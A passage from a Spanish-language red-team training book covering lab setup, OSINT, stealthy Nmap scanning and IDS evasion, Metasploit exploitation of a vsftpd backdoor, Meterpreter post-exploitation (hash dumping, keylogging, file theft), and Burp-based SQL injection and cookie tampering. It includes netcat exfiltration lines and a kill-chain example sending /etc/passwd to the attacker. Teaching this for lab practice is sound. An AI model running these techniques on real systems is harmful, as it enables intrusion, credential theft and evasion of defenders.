La Biblia Negrisima Del Ethical Hacker
La Biblia Negrisima Del Ethical Hacker
Alejandro G Vera
2
Disclaimer inicial del libro
El presente libro, "La biblia negrísima del Ethical Hacker", ha sido desarrollado exclusivamente
con fines educativos, académicos y de investigación, orientado a profesionales con experiencia
comprobada en ciberseguridad, investigadores forenses digitales, integrantes de fuerzas de
seguridad, analistas de inteligencia y estudiantes avanzados de ethical hacking.
Este material NO está diseñado para principiantes absolutos, usuarios sin conocimientos
técnicos o personas sin autorización expresa para realizar pruebas de seguridad. Muchos
de los ejemplos requieren un entendimiento profundo de redes, sistemas operativos,
programación y normativas legales vigentes.
Cualquier intento de replicar los ejemplos aquí presentados en sistemas o redes sin el
permiso expreso de sus propietarios constituye un delito tipificado en múltiples
jurisdicciones y puede implicar consecuencias penales y civiles severas.
Recomendación: Antes de aplicar cualquier técnica descrita, el lector debe asegurarse de:
© 2025 Alejandro G. Vera. Todos los derechos reservados. Queda prohibida la reproducción
total o parcial de este libro, por cualquier medio o procedimiento, incluyendo la reprografía y el
tratamiento informático, la distribución de ejemplares mediante alquiler o préstamo, o la
comunicación pública, sin la autorización previa y por escrito del titular del copyright.
3
Aviso sobre marcas registradas Todas las marcas registradas, nombres comerciales,
logotipos y nombres de productos o servicios mencionados en este libro son propiedad de sus
respectivos titulares. La mención de dichas marcas se realiza únicamente con fines de
identificación, referencia, análisis técnico o contexto histórico, y no implica relación, patrocinio,
aprobación ni respaldo alguno por parte de los titulares de dichas marcas.
El autor no reclama ningún derecho de propiedad sobre las marcas citadas y respeta
plenamente los derechos de propiedad intelectual correspondientes. El uso de estas referencias
se enmarca dentro de lo permitido por las leyes aplicables, incluidas las excepciones de uso
legítimo o fair use, con fines educativos, informativos y de investigación.
4
Índice de “La Biblia Negrísima del
Ethical Hacker”
5
31. Explotación avanzada con buffer overflows
32. Introducción al malware del Red Team
33. PowerShell Empire: control total en Windows
34. Cobalt Strike: simulación de amenazas persistentes
35. Ataques a Active Directory
36. Kerberoasting y Pass-the-Hash
37. Credential Dumping con Mimikatz
38. Creación de payloads indetectables con Veil
39. Evasión de antivirus y EDR
40. Rootkits y backdoors personalizados
6
Parte I – Fundamentos del Red Team
Capítulo 1
El mundo del Red Team es un territorio oscuro, donde la línea que separa al atacante del
defensor es tan fina que a veces se confunde. No se trata solo de aprender comandos, explotar
vulnerabilidades o manejar herramientas como si fueran espadas digitales; se trata de adoptar
una mentalidad. Ser parte de un Red Team significa transformarse en un guerrero cibernético
que piensa como un criminal, pero actúa bajo un marco ético y controlado.
La primera lección del Red Team es clara: la ética no es opcional. Un hacker sin ética es un
criminal. Un hacker con ética se convierte en un maestro del caos al servicio de la defensa. Esa
es la esencia de un Red Team: simular al enemigo, sin ser el enemigo.
7
La palabra “hacker” ha sido ensuciada en los medios. Se asocia con delincuentes, pero su raíz
es noble: explorar, romper barreras, comprender sistemas más allá de sus límites
aparentes. En el Red Team abrazamos esa esencia, pero con un código de honor:
Un pentest puede revelar una puerta trasera en un servidor. Un Red Team puede demostrar
cómo esa puerta trasera se convierte en un acceso completo a toda la red corporativa, pasando
inadvertido durante meses.
El lado negrísimo no se recorre para volverse villano, sino para que el defensor pueda anticipar
cada jugada del enemigo. En otras palabras: se aprende a romper para aprender a proteger.
8
Ejemplo práctico inicial Piensa en un edificio con guardias en la entrada, cámaras y
cerraduras electrónicas. Un pentester revisaría si la cerradura electrónica tiene fallos. Un Red
Teamer, en cambio, disfrazado de repartidor de pizzas, lograría entrar por la puerta principal,
engañar a los guardias, plantar un dispositivo en la sala de servidores y salir sin ser detectado.
Esa es la diferencia: el Red Team piensa como el enemigo, actúa como el enemigo, pero su
propósito final es fortalecer la defensa.
Capítulo 2
Antes de blandir armas como Metasploit, Nmap o Burp Suite, un hacker ético necesita construir
su guarida digital: un laboratorio cerrado, controlado, donde se pueda ensayar lo peor sin
riesgo de contaminar el mundo real. Un espacio aislado en el que los exploits más destructivos y
los payloads más venenosos puedan desplegarse sin que nadie más lo note.
El Red Team sabe que no se juega con fuego sin antes preparar un entorno seguro. Instalar
malware en la máquina personal, probar exploits en la computadora de trabajo o levantar
payloads directamente sobre una red corporativa es un suicidio digital. Por eso, el primer paso
hacia el lado negrísimo es crear un laboratorio oscuro con máquinas virtuales.
● Aislamiento: La VM (máquina virtual) es como una caja cerrada; lo que ocurra dentro no
debe afectar al host.
● Restauración: Los snapshots permiten retroceder en el tiempo después de ejecutar un
exploit o un malware.
● Multiplicidad: Puedes correr varias víctimas y un atacante en el mismo hardware.
● Seguridad: Mantienes tus experimentos lejos de tus datos reales.
En resumen: tu laboratorio es un campo de batalla virtual, donde atacantes y víctimas existen
solo para tus experimentos.
9
Existen varias opciones, pero dos dominan el reino de la virtualización:
Para un principiante furioso, VirtualBox es suficiente. Para un Red Teamer avanzado, VMware
Workstation o un hypervisor dedicado como Proxmox es el camino.
1. Atacante
○ Kali Linux (o Parrot Security OS si prefieres variedad).
○ Preconfigurado con herramientas de explotación, escaneo y post-explotación.
2. Víctimas
○ Windows 10 vulnerable (idealmente versiones desactualizadas o con
configuraciones débiles).
○ Linux (Ubuntu/Debian/CentOS) con servicios inseguros levantados.
○ Máquinas intencionalmente vulnerables como:
■ Metasploitable 2 o 3
■ OWASP Broken Web Apps
■ DVWA (Damn Vulnerable Web App)
3. Red controlada
○ Una red interna (host-only o NAT aislado) donde solo las VMs se hablen entre sí.
○ Sin salida a Internet, para evitar que un malware se escape.
10
○ Ir a Preferencias > Red > Red solo-anfitrión (Host-only).
○ Crear un adaptador que no tenga acceso a Internet.
4. Crear la(s) VM víctima(s)
○ Instalar Metasploitable 2 (descargable en VM prehecha).
○ Configurarla en la misma red interna que Kali.
5. Probar la comunicación
Desde Kali:
ping 192.168.56.101
○
○ Si responde, el laboratorio está vivo.
6. Crear snapshots
○ Antes de lanzar ataques, guarda un snapshot de cada VM.
○ Así podrás volver atrás tras un exploit destructivo.
Advertencias negrísimas
● Nunca expongas tus VMs vulnerables a Internet. Basta un descuido para que un
atacante real entre a tu laboratorio.
● No uses tu máquina principal como víctima. Un exploit puede escapar si el
aislamiento falla.
● Separa las redes. Lo inseguro se queda dentro de lo inseguro.
Conclusión
El laboratorio oscuro es la arena de gladiadores digitales: aquí los exploits se lanzan sin
remordimiento, las redes caen sin consecuencias y la creatividad destructiva se convierte en
conocimiento constructivo.
Sin este espacio controlado, el aprendizaje del Red Team sería un riesgo constante. Con él,
podrás avanzar hacia el lado más negrísimo del hacking con seguridad y disciplina.
11
Capítulo 3
El guerrero digital necesita un arsenal. No una simple caja de herramientas dispersas, sino un
sistema operativo diseñado desde sus entrañas para atacar, explotar, auditar y sobrevivir en el
campo de batalla cibernético. Ese arsenal se llama Kali Linux.
Kali no es una distro más de Linux. Es la katana del Red Team, afilada por la comunidad de
Offensive Security y actualizada constantemente para incorporar las armas más peligrosas de
la red. Pero su poder exige respeto: una instalación mal hecha o un mal uso puede dejar al
aprendiz expuesto a los mismos venenos que pretende estudiar.
12
○ RAM: mínimo 2 GB (recomendado 4 GB o más).
○ CPU: al menos 2 núcleos.
○ Disco duro: 30 GB dinámico.
3. Monta la ISO como disco de arranque.
4. Instala Kali con el instalador gráfico.
○ Usuario por defecto: ya no es root, ahora es un usuario normal con privilegios
sudo.
○ Contraseña: elige algo fuerte.
Reinicia y actualiza:
sudo apt update && sudo apt full-upgrade -y
5.
6. (Opcional) Instala VirtualBox Guest Additions para mejorar el rendimiento gráfico y
compartir carpetas.
13
Descubrir la red local
ip a
nmap -sn 192.168.56.0/24
1. → Esto te dará una lista de objetivos vivos en tu laboratorio.
Advertencias negrísimas
● Nunca uses Kali en la red de tu casa para escanear dispositivos ajenos.
● Aíslalo en la red del laboratorio oscuro (ver Capítulo 2).
● Ten cuidado con Metasploit: un exploit mal lanzado puede corromper sistemas incluso
dentro del laboratorio.
Conclusión
Kali Linux no es solo un sistema operativo, es la catedral del Red Teaming. Aquí están
reunidas las herramientas que permiten a un hacker ético simular los ataques más oscuros,
desde un simple escaneo hasta operaciones complejas de infiltración.
14
El paso de instalar y configurar Kali marca el inicio del viaje: el aprendiz deja de ser un
espectador y se convierte en un combatiente digital.
Capítulo 4
En el arsenal del Red Team, no hay herramienta más elegante y mortal que la línea de
comandos. Mientras los principiantes se refugian en interfaces gráficas y botones brillantes, el
hacker verdadero camina en silencio entre directorios, tecleando órdenes que abren puertas,
filtran datos y transforman bytes en información estratégica.
Filosofía de la terminal
● Minimalismo mortal: un comando bien escrito puede reemplazar horas de clics.
● Velocidad y sigilo: el teclado es más rápido que cualquier GUI.
● Automatización: los scripts son ejércitos de comandos que no se cansan.
● Poder absoluto: un solo rm -rf / en el lugar equivocado puede destruir un sistema.
15
find / -name flag.txt 2>/dev/null # Buscar archivos sospechosos
du -sh * # Ver tamaño de directorios/archivos
# Escuchar en un puerto
nc -lvnp 4444
# Transferir un archivo
nc -w 3 192.168.56.101 4444 < secreto.txt
Netcat es la navaja suiza del hacker: shell reversa, chat clandestino, exfiltración de datos.
6. Procesos y control
Ejemplo:
16
cat /var/log/auth.log | grep "Failed" | awk '{print $11}' | sort | uniq
-c | sort -nr
Resultado: listado de IPs que fallaron intentos de login, ordenadas por frecuencia. Una
radiografía de un ataque de fuerza bruta en segundos.
Esto revela logins exitosos. Ahora podemos rastrear qué usuario, desde qué IP, y a qué hora se
conectó.
Advertencias negrísimas
● Nunca ejecutes comandos a ciegas. Un rm o dd mal usado puede borrar tu laboratorio
entero.
● No copies comandos de foros sin entenderlos. Cada símbolo (>, |, *) puede ser un
arma de doble filo.
● La terminal no perdona errores tipográficos. Un carácter mal puesto puede significar
destrucción.
17
3.
Ahora envíalas a un archivo secreto:
grep "pass" creds.txt | awk '{print $2}' > passwords.txt
cat passwords.txt
4.
Con solo tres comandos, has extraído credenciales como lo harías al filtrar logs robados en
una intrusión.
Conclusión
La línea de comandos es más que un medio de control: es la lengua de los hackers.
Dominarla significa moverse con rapidez en servidores comprometidos, filtrar información con
precisión quirúrgica y automatizar ataques como si invocaras demonios digitales.
El Red Teamer que domina la terminal no necesita interfaces gráficas: su katana es el teclado,
su campo de batalla es la shell.
Capítulo 5
El campo de batalla del Red Team no es físico: es una red. Cada paquete de datos es un
mensajero; cada puerto abierto, una puerta secreta; cada protocolo, un dialecto que el hacker
debe aprender para moverse entre las sombras. Quien no comprende las redes, vaga ciego en
un mundo donde los verdaderos guerreros caminan invisibles.
Recordemos:
18
El modelo OSI para hackers
El modelo OSI es visto en academias como un esquema aburrido. Pero en el Red Team, cada
capa es un frente de ataque.
Saber en qué capa estás atacando es clave: no es lo mismo un phishing (aplicación) que un
ARP spoofing (enlace).
19
Protocolos esenciales del guerrero
1. TCP y UDP
4. HTTP/HTTPS
20
● Wireshark → Captura y análisis de tráfico.
● Tcpdump → Sniffer ligero en terminal.
● Scapy → Forjar y manipular paquetes como un dios digital.
Advertencias negrísimas
● Nunca escanees redes que no te pertenecen. Incluso un ping fuera de tu laboratorio
puede ser detectado como intento de intrusión.
● Recuerda: cada paquete que envías es como dejar una huella en la arena. Aprende a
disimularlas.
● No subestimes las capas bajas (2 y 1). Muchos ataques efectivos empiezan con
simples manipulaciones de ARP o Wi-Fi.
21
Conclusión
Entender las redes es respirar como el enemigo. Cada capa es un punto de ataque, cada
protocolo una grieta potencial. El Red Teamer no memoriza la teoría como en la universidad: la
usa como mapa de guerra.
Dominar TCP/IP es más que conocimiento: es la diferencia entre ser un script kiddie perdido en
tutoriales o un hacker negrísimo capaz de navegar las sombras del ciberespacio.
Capítulo 6
Un Red Teamer no se limita a explotar vulnerabilidades técnicas: piensa, respira y actúa como
un atacante real. El laboratorio oscuro no es un lugar donde solo se lanzan exploits al azar, sino
donde se estudia la psicología del enemigo, se modelan sus tácticas y se anticipan sus
jugadas.
El Red Team no busca si hay vulnerabilidades, sino cómo un atacante real las explotaría en
función de su perfil.
Perfiles de adversarios
22
Tipo de Motivación Recursos Ejemplos reales
atacante
Cada uno de estos atacantes deja huellas distintas y plantea amenazas diferentes.
Ejemplo práctico:
23
Una matriz que describe técnicas usadas por adversarios reales en cada fase del ataque:
MITRE ATT&CK no es teoría: es el manual de los enemigos reales. El Red Team lo usa
para simular APTs.
24
2. Acceso inicial: enviar phishing con adjunto PDF malicioso.
3. Ejecución: payload que abre shell reversa.
4. Persistencia: crear usuario admin oculto en Active Directory.
5. Exfiltración: enviar base de datos cifrada vía DNS tunneling.
Esto es pensar como atacante: paso a paso, no solo explotar un bug, sino construir un
ataque completo.
Advertencias negrísimas
● Modelar amenazas no es solo teoría: es planear ataques como si fueras el enemigo.
● Cuidado con la línea ética: un Red Teamer simula, pero no ejecuta sin autorización
explícita.
● No subestimes a los insiders: muchas organizaciones se protegen del exterior, pero
olvidan al enemigo dentro.
25
Conclusión
Pensar como atacante no es solo saber de exploits, sino construir una narrativa de ataque:
entender qué quiere el enemigo, cómo lo haría y qué barreras enfrentaría. El modelo de
amenaza es el mapa de guerra del Red Team.
El hacker que internaliza esta mentalidad deja de jugar con herramientas y empieza a dirigir
operaciones ofensivas completas. El Red Teamer no improvisa: ejecuta planes oscuros,
basados en la lógica del adversario real.
Capítulo 7
El reconocimiento pasivo es la disciplina del espionaje digital sin ser detectado. Aquí no
lanzamos exploits ni enviamos tráfico sospechoso; nos limitamos a observar, recolectar y
conectar piezas del rompecabezas hasta conocer más del objetivo que él mismo de sí.
26
Sublist3r: busca subdominios.
sublist3r -d ejemplo.com
●
● crt.sh: certificados SSL revelan subdominios ocultos.
Ejemplos de queries:
3. Metadatos en documentos
Los documentos subidos a la web suelen contener datos ocultos: usuario que los creó, rutas de
sistemas, software utilizado.
Exiftool:
exiftool documento.pdf
●
5. Filtraciones y leaks
27
Objetivo: empresa “DarkBank S.A.”
1. Google Dorking:
○ Encuentro PDFs con site:darkbank.com filetype:pdf.
○ En los metadatos aparece el nombre de usuario interno:
[email protected].
2. LinkedIn:
○ Descubro 5 empleados de soporte técnico con perfil público.
3. Shodan:
○ Identifico un firewall expuesto con firmware desactualizado.
4. Have I Been Pwned:
○ Uno de los correos de soporte ya apareció en una filtración con contraseña
dark123.
Con solo 1 hora de OSINT, tengo usuarios, contraseñas filtradas y posibles vectores de
ataque, sin haber enviado un solo paquete al objetivo.
Sublist3r / Subdominios
Amass
Advertencias negrísimas
● El OSINT puede ser ilegal si se cruza la línea: descargar datos privados no expuestos
públicamente es intrusión.
● No confundas pasivo con seguro: incluso búsquedas masivas desde tu IP pueden
levantar sospechas.
● Todo lo que encuentres debe quedarse en tu laboratorio: filtrar datos recolectados
es una violación ética y legal.
28
Mini laboratorio práctico
Objetivo: recolectar información inicial sobre un dominio ficticio.
● Correos de empleados.
● Subdominios ocultos.
● Metadatos con pistas internas.
● Posibles credenciales filtradas.
Conclusión
El reconocimiento pasivo es el arte de ver sin ser visto. Un buen OSINT puede dar acceso a
contraseñas filtradas, correos corporativos y vulnerabilidades expuestas, todo sin tocar el
objetivo directamente.
El Red Teamer que domina OSINT camina entre las sombras como un espía digital: recolecta
secretos, conecta hilos invisibles y prepara la emboscada perfecta. La información es poder, y
en el lado negrísimo, el poder lo es todo.
Capítulo 8
El reconocimiento pasivo nos dio nombres, correos y pistas. Pero llega el momento de dar el
primer paso directo hacia la víctima: enviar paquetes, tocar sus puertas, escuchar cómo
resuenan. Eso es el reconocimiento activo: un escaneo calculado, invisible y preciso.
29
En este terreno, el Red Teamer debe ser como un ladrón en la noche: examinar cada ventana
sin encender la linterna, tocando sin dejar huellas. El escaneo agresivo del principiante puede
sonar como un golpe de ariete. El escaneo negrísimo del Red Team debe ser un susurro
imperceptible.
Un error común: lanzar nmap -A -p- -T5 objetivo.com y creer que se es un hacker. Eso
solo levanta alarmas. El arte está en entrar y salir sin ser visto.
nmap -f 192.168.56.101
3. Timing y velocidad
4. Uso de decoys
30
nmap -sT -Pn --proxy socks4://127.0.0.1:9050 192.168.56.101
hping3 -S -p 80 -c 1 192.168.56.101
Usado para escaneos masivos de Internet. Ideal para investigaciones globales, no para un Red
Team corporativo.
Técnicas de sigilo
Escaneo slow & low: Escanear 1 puerto cada 10 segundos puede tomar días, pero muchos
IDS lo pasan por alto.
nmap -p 1-65535 -T0 --scan-delay 10s 192.168.56.101
●
● Evasion con fragmentación: dividir paquetes y reordenarlos.
● Spoofing de IPs: simular que los paquetes provienen de otra máquina.
● VPNs encadenadas o Tor: capas de anonimato, aunque sacrifican velocidad.
31
Con Nmap, escaneo lento de puertos solo en subdominios críticos:
nmap -sS -p 22,80,443 -T2 -f banco.ejemplo.com
2.
3. Si detecto WAF o firewall estricto, cambio a hping3 para pruebas individuales.
4. Finalmente, documento resultados sin ser bloqueado: servicios activos, versiones y
posibles vulnerabilidades.
Advertencias negrísimas
● Nunca uses Masscan fuera del laboratorio. Escanear medio Internet levanta alarmas
globales.
● Un escaneo activo SIEMPRE deja huella. La misión no es eliminarla, sino disfrazarla.
● El Red Team autorizado simula ataques reales, pero dentro de un alcance acordado.
Conclusión
El reconocimiento activo es el primer contacto real con la víctima. Aquí se decide si el ataque
será un cañonazo o un susurro. El Red Teamer que domina el escaneo sabe tocar sin ser
oído, ver sin ser visto, y preparar el terreno para la explotación sin que el enemigo lo detecte.
El sigilo es el arte que convierte a un script kiddie en un guerrero negrísimo del Red Team.
32
Capítulo 9
El Red Team no dispara sin conocer a quién enfrenta. Antes de lanzar un exploit, hay que saber
qué sistema vive detrás de una IP, qué versión, qué puertos abiertos y qué secretos revela sin
querer. El fingerprinting es la autopsia del objetivo en vida: nos dice cómo late su corazón
digital.
Con Nmap
nmap -O 192.168.56.101
Diferentes sistemas operativos responden con distintos valores de TTL y window size.
ping -c 1 192.168.56.101
●
○ TTL=128 → Windows.
○ TTL=64 → Linux.
33
○ TTL=255 → Cisco/Unix.
Fingerprinting de servicios
1. Banner grabbing
nc -vn 192.168.56.101 21
whatweb http://192.168.56.101
4. httprint
Analiza patrones en cabeceras HTTP para descubrir el servidor web incluso si oculta su banner.
34
○ MySQL 5.0.51a
Fingerprinting encubierto
No siempre puedes usar Nmap directo. Algunos métodos de sigilo:
Advertencias negrísimas
● Nunca confíes ciegamente en el fingerprinting. Firewalls y proxys pueden falsear
respuestas.
● Algunas organizaciones ocultan banners. No te fíes: siempre busca múltiples fuentes.
● El fingerprinting mal hecho te delata. Un flood de escaneos es como golpear la puerta
con un ariete en lugar de tocar suavemente.
35
Usar WhatWeb en el puerto 80:
whatweb http://192.168.56.101
3.
Validar resultados con p0f (análisis pasivo):
sudo p0f -i eth0
4.
El fingerprinting te dará un retrato completo de la víctima: qué SO usa, qué servicios ofrece
y qué versiones tiene. El mapa perfecto antes de atacar.
Conclusión
El fingerprinting es la fase donde el enemigo empieza a tener rostro. Ya no es solo una IP en el
vacío: ahora sabemos si es un Linux viejo, un Windows sin parches, un Apache obsoleto o un
WordPress mal protegido.
El Red Teamer que domina esta fase convierte información técnica en armas estratégicas.
Porque cada servicio revelado es una grieta, y cada versión identificada es un camino directo
hacia el lado más negrísimo del hacking.
Capítulo 10
El Red Teamer debe comprender este ciclo de vida del ataque no solo para ejecutarlo, sino
para pensarlo como lo haría un adversario real. Cada fase tiene sus tácticas, sus herramientas y
sus oportunidades de ser detectado o de pasar desapercibido.
36
El Cyber Kill Chain (versión hacker negrísima)
1. Reconocimiento (cap. 7 y 8)
El ataque empieza antes de tocar la puerta. Se buscan nombres, correos, direcciones IP,
servicios, leaks.
2. Armamento (weaponization)
3. Entrega (delivery)
El arma llega a la víctima: phishing, USB infectado, descarga web, exploit remoto.
4. Explotación (exploitation)
5. Instalación (installation)
37
6. Control y Comando (C2)
● Reconocimiento → el acecho.
● Armamento → el cuchillo afilado.
● Entrega → la mano que lo acerca.
● Explotación → el tajo inicial.
● Instalación → el veneno que se queda.
● C2 → la cadena que controla.
● Acciones finales → el botín, el caos o el silencio.
38
5. Instalación: creo usuario oculto “shadow”.
6. C2: establezco meterpreter para control remoto.
7. Acción final: extraigo /etc/passwd y lo envío a mi Kali.
Advertencias negrísimas
● Cada fase deja rastros. Un buen Blue Team detecta en qué punto entraste.
● Nunca ejecutes el ciclo completo fuera de tu laboratorio sin autorización legal.
● Un ataque real rara vez es lineal. El adversario puede saltar fases, repetirlas o
combinarlas.
Conclusión
El ciclo de vida del ataque es la coreografía del lado negrísimo. Cada paso prepara el
siguiente, y el éxito depende de la disciplina y el sigilo. Un Red Teamer no improvisa: planea,
ejecuta y documenta.
Quien domina el kill chain no solo sabe atacar, sino que también puede anticipar cómo otros lo
harán. Y en esa simetría entre ataque y defensa, nace la verdadera fuerza del guerrero digital.
En el arsenal del Red Team, pocas armas son tan versátiles, afiladas y respetadas como Nmap
(Network Mapper). Para el principiante es un simple escáner de puertos; para el guerrero
negrísimo, es un bisturí digital capaz de radiografiar un sistema entero con precisión
quirúrgica.
Nmap no es solo una herramienta: es la navaja multiusos del hacker. Sirve para detectar
hosts, identificar sistemas operativos, descubrir servicios, mapear firewalls, automatizar ataques
y hasta ejecutar scripts que van más allá del reconocimiento.
Escaneos básicos
1. Descubrimiento de hosts (ping scan)
nmap -sn 192.168.56.0/24
40
Escaneos avanzados
1. SYN scan (stealth scan)
nmap -sS 192.168.56.101
2. UDP scan
nmap -sU 192.168.56.101
Evasión y sigilo
1. Fragmentación de paquetes
nmap -f 192.168.56.101
3. Velocidad y timing
nmap -T0 192.168.56.101
41
4. Bypass de firewall (puerto específico)
nmap -p 443 --open --script=ssl-heartbleed 192.168.56.101
Ejemplos:
1. Escaneo inicial:
nmap -sS -sV -O 192.168.56.101
2. Usando NSE:
nmap --script=ftp-anon -p 21 192.168.56.101
3. Luego:
42
nmap --script=mysql-empty-password -p 3306 192.168.56.101
Advertencias negrísimas
● Cada escaneo deja una huella. El Blue Team puede detectar patrones típicos de
Nmap.
● NSE mal usado puede tumbar servicios. No lo ejecutes en sistemas críticos sin
autorización.
● Escaneos masivos en Internet son ilegales y altamente visibles.
2. Identificar servicios:
nmap -sV 192.168.56.101
Obtendrás un mapa completo del objetivo, suficiente para preparar el siguiente ataque.
Conclusión
Nmap es más que un escáner: es la lupa, la linterna y el bisturí del hacker ético. Un Red
Teamer que domina Nmap puede ver el sistema antes de tocarlo, diseccionar servicios con
precisión y preparar ataques quirúrgicos sin desperdiciar tiempo.
En el camino negrísimo, Nmap es la primera hoja que abre la piel del objetivo para dejar al
descubierto su carne digital.
43
Capítulo 12
Usar Nmap en su modo básico es como blandir un machete en medio de la selva: ruidoso,
efectivo pero torpe. Un Red Teamer verdadero debe aprender a usarlo como un bisturí
silencioso, capaz de penetrar defensas sin despertar sospechas.
Aquí exploraremos las técnicas de evasión más oscuras: métodos para engañar IDS, confundir
firewalls y simular ser un fantasma en la red.
Usa una máquina “zombie” para escanear, de modo que el tráfico parezca venir de otro host.
44
● -T0 y -T1 → modo paranoico y sigiloso.
● --scan-delay → introduce pausas entre paquetes.
4. Fragmentación de paquetes
6. Spoofing de direcciones IP
Algunos firewalls permiten tráfico si viene de puertos conocidos (ej. 53/DNS o 80/HTTP).
45
8. Bypass con proxies y Tor
Advertencias negrísimas
● Los IDS modernos (Snort, Suricata, Zeek) detectan patrones de Nmap. Usa técnicas
combinadas para engañarlos.
● Idle Scan requiere un zombie con IPID predecible. No cualquier host sirve.
● Spoofing sin canal de retorno es inútil. Escaneas, pero no ves resultados.
● El exceso de decoys puede levantar sospechas aún mayores.
Fragmentación de paquetes:
nmap -sS -f 192.168.56.101
1.
Manipulación de puertos de origen:
nmap -sS -g 53 192.168.56.101
2.
46
Idle Scan (si tienes zombie disponible):
nmap -sI 192.168.56.200 192.168.56.101
3.
Escaneo sigiloso con delay:
nmap -sS -p- --scan-delay 5s 192.168.56.101
4.
Compara con los logs de la víctima: verás cómo cambia la “firma” de tu ataque.
Conclusión
Las técnicas avanzadas de Nmap convierten un escaneo burdo en una operación de espionaje
quirúrgico. Aquí no se trata de descubrir puertos abiertos, sino de pasar desapercibido
mientras lo haces.
El Red Teamer negrísimo entiende que cada firewall y cada IDS son guardianes que pueden ser
engañados con paciencia, creatividad y silencio digital. Nmap, usado en modo extremo, es más
que un escáner: es la daga invisible que corta sin dejar sangre.
Capítulo 13
Metasploit no es una herramienta, es una catedral del ataque ofensivo, construida para ser la
artillería pesada del Red Team. Aquí no hay improvisación: cada exploit es una bala lista para
ser disparada con precisión quirúrgica.
Filosofía de Metasploit
● El exploit no es el fin, es el inicio.
● Cada payload es una semilla de control.
● La post-explotación es el verdadero botín.
El hacker sin Metasploit dispara flechas; el hacker con Metasploit dispara misiles teledirigidos.
47
Anatomía de Metasploit
Metasploit se organiza en módulos:
2. Buscar un exploit:
search vsftpd
3. Seleccionar el exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
4. Configurar opciones:
set RHOSTS 192.168.56.101
set RPORT 21
5. Elegir payload:
set PAYLOAD cmd/unix/interact
6. Disparar:
exploit
48
Ejemplos:
● Captura de pantalla
screenshot
● Keylogger
keyscan_start
keyscan_dump
49
Ejemplo narrativo en laboratorio
Escenario: Atacando Metasploitable 2.
Advertencias negrísimas
● Metasploit es un arma de doble filo. Usarla fuera del laboratorio o sin autorización es
delito.
● Muchos exploits son inestables. Pueden tumbar servicios o incluso toda la máquina.
● Nunca confíes en Meterpreter eterno. Un reinicio puede eliminar la sesión: usa
persistencia.
Si logras esto, ya habrás sentido el poder de la artillería pesada del Red Team.
Conclusión
50
Metasploit es el campo de batalla digital condensado en un framework. Desde un único
entorno puedes escanear, explotar, pivotar y persistir. El Red Teamer que domina Metasploit no
es un aficionado: es un arquitecto de ataques completos, capaz de mover piezas en silencio
hasta tomar el control total.
El script kiddie copia comandos; el guerrero negrísimo escribe su propia sinfonía de exploits en
la artillería pesada del hacking ofensivo.
Capítulo 14
Explotar un servicio y obtener acceso es apenas el primer bocado. El verdadero banquete del
Red Teamer comienza después: la post-explotación. Aquí se decide si el atacante se va con
un simple trofeo o se convierte en un fantasma residente en el sistema, invisible y omnipresente.
Meterpreter, el payload estrella de Metasploit, es la herramienta ideal para esta fase: una shell
avanzada que se carga en memoria, sin dejar rastros en disco, y que permite realizar todo tipo
de operaciones sin ser detectado fácilmente.
Filosofía de la post-explotación
● El exploit abre la puerta, pero Meterpreter amuebla la casa.
● El atacante no busca solo acceso: busca control total.
● Persistir y moverse sigilosamente es más valioso que un ataque ruidoso.
1. Recolección de información
● Sistema y usuario
sysinfo
getuid
● Listado de procesos
ps
51
● Volcado de hashes (Windows)
hashdump
2. Persistencia y movimiento
3. Keylogging y espionaje
● Captura de teclado
keyscan_start
keyscan_dump
● Captura de pantalla
screenshot
● Descargar archivo
download secret.docx /home/attacker/loot/
52
portfwd add -l 8080 -p 80 -r 192.168.56.200
El exploit inicial era solo el inicio. El festín real vino después, cuando la máquina me entregó
sus secretos sin resistencia.
Advertencias negrísimas
● Meterpreter en memoria es sigiloso, pero no indetectable. EDRs modernos
(CrowdStrike, Defender ATP) pueden identificar comportamientos sospechosos.
● Persistencia mal hecha = alarma inmediata. Un backdoor demasiado ruidoso
despierta al Blue Team.
● Moverse lateralmente sin estrategia puede delatarte. Cada salto debe planearse con
precisión.
53
Mini laboratorio práctico
Objetivo: practicar post-explotación en Metasploitable.
Conclusión
La post-explotación con Meterpreter es el corazón del Red Teaming: no basta con abrir la
puerta, hay que explorar la casa, robar documentos, escuchar conversaciones y dejar una
ventana siempre abierta para volver.
Capítulo 15
En el arsenal del Red Team, pocas armas son tan precisas y afiladas como Burp Suite. Si
Metasploit es la artillería pesada, Burp es el bisturí: la herramienta para abrir en canal una
aplicación web, examinar cada petición, alterar cada respuesta y descubrir las grietas por donde
se cuela el atacante.
Un sitio web parece sólido para el usuario común. Pero cuando Burp está en medio, cada clic,
cada cookie, cada parámetro es una oportunidad para el hacker. La diferencia entre un script
54
kiddie y un Red Teamer negrísimo está en saber manipular el tráfico como un cirujano
manipula el bisturí.
55
2. Interceptar una petición
Ejemplo:
1. Petición original:
POST /login HTTP/1.1
user=admin&pass=1234
Si el servidor responde con “Bienvenido admin”, has encontrado una inyección SQL.
Las respuestas con diferente longitud o código HTTP revelan la contraseña correcta.
user=john' OR '1'='1&pass=1234
3. Uso Intruder para brute force sobre campo “user”. → Encuentro usuarios reales.
4. Con Decoder, manipulo cookie de sesión:
○ Cookie original: dXNlcj1qb2hu
○ Decodificada: user=john
○ Modifico a user=admin, recodifico y envío. → Acceso como administrador.
Advertencias negrísimas
● Burp puede romper sesiones reales. Nunca interceptes tráfico de aplicaciones en
producción sin autorización.
● Intruder es ruidoso. Puede activar mecanismos de seguridad (WAF, bloqueos de IP).
● Algunos sitios detectan proxies. Usa VM y proxys encadenados para ocultar tu Burp.
Conclusión
57
Burp Suite es más que un proxy: es el quirófano del hacker web. Con él, puedes interceptar,
modificar y manipular cada bit que viaja entre cliente y servidor. El Red Teamer que domina
Burp no ve páginas bonitas: ve parámetros, cabeceras y sesiones como órganos expuestos
sobre una mesa de operaciones.
En el camino negrísimo, Burp Suite es el bisturí con el que se diseccionan las aplicaciones,
hasta que el código sangra sus secretos.
Capítulo 16
No todo ataque empieza con un exploit sofisticado. Muchas veces basta con olfatear un sitio
web para encontrar grietas abiertas, configuraciones débiles o errores de administración. Aquí
entran en juego dos sabuesos del Red Team: Nikto y Wfuzz.
Ejemplo básico:
nikto -h http://192.168.56.101
58
Opciones útiles:
● Escanear SSL:
